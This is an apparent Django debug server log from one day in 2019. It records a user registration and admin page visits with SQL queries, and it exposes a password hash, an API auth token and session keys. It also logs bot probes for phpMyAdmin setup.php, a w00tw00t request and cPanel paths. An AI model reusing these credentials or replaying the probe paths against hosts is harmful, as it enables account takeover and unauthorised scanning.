"django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T12:37:58.577292+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 12, 37, 58, 577292, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 12:37:58,591 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [29/Nov/2019 12:37:58] "GET /jsi18n/ HTTP/1.0" 200 3223 [29/Nov/2019 12:38:26] "OPTIONS /api/register HTTP/1.0" 200 187 DEBUG 2019-11-29 12:38:26,827 utils 26999 140702522537728 (0.003) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'helloyopmail' LIMIT 1; args=('helloyopmail',) DEBUG 2019-11-29 12:38:26,828 utils 26999 140702522537728 (0.000) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'hello@yopmail.com' LIMIT 1; args=('hello@yopmail.com',) DEBUG 2019-11-29 12:38:27,060 utils 26999 140702522537728 (0.002) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$BSLhaEizIqCZ$hdcbVSXxMNp57+LAp8LMB0+v3m7QuYiLDqu7cx+vgqc=', NULL, false, 'helloyopmail', '', '', 'hello@yopmail.com', false, true, '2019-11-29T12:38:26.829600+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$BSLhaEizIqCZ$hdcbVSXxMNp57+LAp8LMB0+v3m7QuYiLDqu7cx+vgqc=', None, False, 'helloyopmail', '', '', 'hello@yopmail.com', False, True, datetime.datetime(2019, 11, 29, 12, 38, 26, 829600, tzinfo=)) DEBUG 2019-11-29 12:38:27,063 utils 26999 140702522537728 (0.002) INSERT INTO "authtoken_token" ("key", "user_id", "created") VALUES ('b5e54905e7493405e64ac8731a20f74b9231e5f8', 7, '2019-11-29T12:38:27.061561+00:00'::timestamptz); args=('b5e54905e7493405e64ac8731a20f74b9231e5f8', 7, datetime.datetime(2019, 11, 29, 12, 38, 27, 61561, tzinfo=)) [29/Nov/2019 12:38:27] "POST /api/register HTTP/1.0" 201 113 Not Found: /api/api-token-auth/ [29/Nov/2019 12:38:35] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6439 DEBUG 2019-11-29 12:38:42,073 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T12:38:42.063805+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 12, 38, 42, 63805, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 12:38:42,076 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 12:38:42,078 utils 26999 140702522537728 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-11-29 12:38:42,080 utils 26999 140702522537728 (0.001) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 12:38:42,081 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 12:38:42,086 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-11-29 12:38:42,173 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T12:38:42.171408+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 12, 38, 42, 171408, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 12:38:42] "GET /auth/user/ HTTP/1.0" 200 9113 DEBUG 2019-11-29 12:38:42,670 utils 26999 140702522537728 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T12:38:42.655428+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 12, 38, 42, 655428, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 12:38:42,673 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [29/Nov/2019 12:38:42] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-11-29 12:38:47,616 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T12:38:47.606102+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 12, 38, 47, 606102, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 12:38:47,619 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 12:38:47,659 utils 26999 140702522537728 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-11-29 12:38:47,663 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T12:38:47.661325+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 12, 38, 47, 661325, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 12:38:47] "GET / HTTP/1.0" 200 6019 [29/Nov/2019 12:41:07] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:46:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:51:19] "GET / HTTP/1.0" 302 0 [29/Nov/2019 12:56:25] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:01:27] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:06:38] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:11:44] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:16:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:21:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:27:00] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 13:32:08] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:37:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:42:20] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:47:26] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:52:32] "GET / HTTP/1.0" 302 0 [29/Nov/2019 13:53:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 13:53:08,417 utils 26999 140702522537728 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uet3lnatqfzosd18jcjx98qcox4iom80' LIMIT 1; args=('uet3lnatqfzosd18jcjx98qcox4iom80',) DEBUG 2019-11-29 13:53:08,419 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uet3lnatqfzosd18jcjx98qcox4iom80', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T13:53:08.418096+00:00'::timestamptz); args=('uet3lnatqfzosd18jcjx98qcox4iom80', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 13, 53, 8, 418096, tzinfo=)) [29/Nov/2019 13:53:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 13:57:39] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:02:43] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 14:07:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:12:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:17:59] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:23:06] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:28:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:33:19] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:38:23] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:43:31] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 14:46:29,254 utils 26999 140702522537728 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uoolpqcee0uln8xifnawtkal57bjwh9q' LIMIT 1; args=('uoolpqcee0uln8xifnawtkal57bjwh9q',) DEBUG 2019-11-29 14:46:29,256 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uoolpqcee0uln8xifnawtkal57bjwh9q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T14:46:29.254744+00:00'::timestamptz); args=('uoolpqcee0uln8xifnawtkal57bjwh9q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 14, 46, 29, 254744, tzinfo=)) [29/Nov/2019 14:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 14:48:35] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:50:09] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:53:39] "GET / HTTP/1.0" 302 0 [29/Nov/2019 14:58:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:03:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:07:21] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:08:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:14:07] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:19:11] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:24:17] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:29:23] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:34:30] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:39:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:44:44] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:49:50] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:54:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 15:59:57] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:05:08] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:07:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:10:15] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:15:15] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:20:26] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:25:31] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:30:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:35:43] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:40:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:45:54] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:50:59] "GET / HTTP/1.0" 302 0 [29/Nov/2019 16:56:06] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:01:13] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:06:16] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:11:24] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:16:31] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:21:36] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:24:08] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:26:42] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:31:48] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:36:53] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:42:00] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 17:46:29,120 utils 26999 140702522537728 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gepbkq7no72psjwuc1i9b7qixprcetee' LIMIT 1; args=('gepbkq7no72psjwuc1i9b7qixprcetee',) DEBUG 2019-11-29 17:46:29,122 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gepbkq7no72psjwuc1i9b7qixprcetee', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T17:46:29.121140+00:00'::timestamptz); args=('gepbkq7no72psjwuc1i9b7qixprcetee', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 17, 46, 29, 121140, tzinfo=)) [29/Nov/2019 17:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 17:47:04] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:52:07] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:55:20] "GET / HTTP/1.0" 302 0 [29/Nov/2019 17:57:16] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:02:22] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:07:25] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:12:31] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:12:41] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:17:38] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:22:46] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:27:51] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [29/Nov/2019 18:32:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:37:57] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:43:08] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:48:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:53:17] "GET / HTTP/1.0" 302 0 [29/Nov/2019 18:58:25] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:03:25] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:08:30] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:12:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 19:12:27,991 utils 26999 140702522537728 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'w7zef4imd8j57at40p8f2n7n1myle7fu' LIMIT 1; args=('w7zef4imd8j57at40p8f2n7n1myle7fu',) DEBUG 2019-11-29 19:12:27,994 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('w7zef4imd8j57at40p8f2n7n1myle7fu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T19:12:27.992292+00:00'::timestamptz); args=('w7zef4imd8j57at40p8f2n7n1myle7fu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 19, 12, 27, 992292, tzinfo=)) [29/Nov/2019 19:12:27] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 19:13:41] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:18:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:23:53] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:28:58] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:34:04] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Nov/2019 19:35:21] "GET /robots.txt HTTP/1.0" 404 6406 Not Found: /ShowAuthor.asp [29/Nov/2019 19:35:23] "GET /ShowAuthor.asp?ChannelID=1002&AuthorName=%C2%B2%C3%94%C3%84%C3%8F%C2%BD%C3%8C%C3%93%C3%BD%C3%8D%C3%B8 HTTP/1.0" 404 6509 Not Found: /jyky/ShowClass.asp [29/Nov/2019 19:35:25] "GET /jyky/ShowClass.asp?ClassID=%E6%AF%8D%E8%AF%AD%E6%98%AF%E5%AD%95%E8%82%B2%E6%96%87%E5%AD%A6%E7%9A%84%E8%83%8E%E5%BA%8A7&page=%E6%AF%8D%E8%AF%AD%E6%98%AF%E5%AD%95%E8%82%B2%E6%96%87%E5%AD%A6%E7%9A%84%E8%83%8E%E5%BA%8A HTTP/1.0" 404 6630 [29/Nov/2019 19:39:11] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:44:15] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:49:21] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:52:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 19:52:36,114 utils 26999 140702522537728 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yt67aocewedfixu740kunwxttyb44329' LIMIT 1; args=('yt67aocewedfixu740kunwxttyb44329',) DEBUG 2019-11-29 19:52:36,115 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yt67aocewedfixu740kunwxttyb44329', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T19:52:36.114460+00:00'::timestamptz); args=('yt67aocewedfixu740kunwxttyb44329', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 19, 52, 36, 114460, tzinfo=)) [29/Nov/2019 19:52:36] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 19:54:25] "GET / HTTP/1.0" 302 0 [29/Nov/2019 19:59:31] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:04:36] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:05:50] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [29/Nov/2019 20:07:06] "GET /robots.txt HTTP/1.0" 404 6406 Not Found: /cgi-sys/defaultwebpage.cgi [29/Nov/2019 20:07:30] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 6454 [29/Nov/2019 20:09:44] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:14:50] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:19:56] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:25:03] "GET / HTTP/1.0" 302 0 Not Found: /w00tw00t.at.blackhats.romanian.anti-sec:) [29/Nov/2019 20:29:50] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.0" 404 6498 Not Found: /phpMyAdmin/scripts/setup.php [29/Nov/2019 20:29:51] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6459 Not Found: /phpmyadmin/scripts/setup.php [29/Nov/2019 20:29:51] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6459 Not Found: /pma/scripts/setup.php [29/Nov/2019 20:29:51] "GET /pma/scripts/setup.php HTTP/1.0" 404 6438 Not Found: /myadmin/scripts/setup.php [29/Nov/2019 20:29:51] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6450 Not Found: /MyAdmin/scripts/setup.php [29/Nov/2019 20:29:51] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6450 [29/Nov/2019 20:30:04] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:35:14] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:40:18] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:41:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 20:41:50,252 utils 26999 140702522537728 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l364hn57iewpi7vyak4a65ki04jx8cvc' LIMIT 1; args=('l364hn57iewpi7vyak4a65ki04jx8cvc',) DEBUG 2019-11-29 20:41:50,253 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l364hn57iewpi7vyak4a65ki04jx8cvc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T20:41:50.252584+00:00'::timestamptz); args=('l364hn57iewpi7vyak4a65ki04jx8cvc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 20, 41, 50, 252584, tzinfo=)) [29/Nov/2019 20:41:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 20:42:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 20:42:17,284 utils 26999 140702522537728 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '60jhccp2z5nc2mhi1l7dstgd6k4v1okn' LIMIT 1; args=('60jhccp2z5nc2mhi1l7dstgd6k4v1okn',) DEBUG 2019-11-29 20:42:17,287 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('60jhccp2z5nc2mhi1l7dstgd6k4v1okn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T20:42:17.285259+00:00'::timestamptz); args=('60jhccp2z5nc2mhi1l7dstgd6k4v1okn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 20, 42, 17, 285259, tzinfo=)) [29/Nov/2019 20:42:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 20:45:20] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 20:46:29,103 utils 26999 140702522537728 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '1bzvv0k3czo1e8mycv27ffxlifcuamyn' LIMIT 1; args=('1bzvv0k3czo1e8mycv27ffxlifcuamyn',) DEBUG 2019-11-29 20:46:29,105 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('1bzvv0k3czo1e8mycv27ffxlifcuamyn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T20:46:29.103944+00:00'::timestamptz); args=('1bzvv0k3czo1e8mycv27ffxlifcuamyn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 20, 46, 29, 103944, tzinfo=)) [29/Nov/2019 20:46:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 20:50:30] "GET / HTTP/1.0" 302 0 [29/Nov/2019 20:55:33] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:00:41] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:05:44] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:10:47] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:15:49] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:20:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 21:20:38,637 utils 26999 140702522537728 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '65cyn1r499u1l1fhzhkozs9ztx8p3jx8' LIMIT 1; args=('65cyn1r499u1l1fhzhkozs9ztx8p3jx8',) DEBUG 2019-11-29 21:20:38,639 utils 26999 140702522537728 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('65cyn1r499u1l1fhzhkozs9ztx8p3jx8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T21:20:38.637763+00:00'::timestamptz); args=('65cyn1r499u1l1fhzhkozs9ztx8p3jx8', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 21, 20, 38, 637763, tzinfo=)) [29/Nov/2019 21:20:38] "GET /login/?next=/ HTTP/1.0" 200 1786 [29/Nov/2019 21:21:06] "GET / HTTP/1.0" 302 0 [29/Nov/2019 21:26:12] "GET / HTTP/1.0" 302 0 [29/Nov/2019 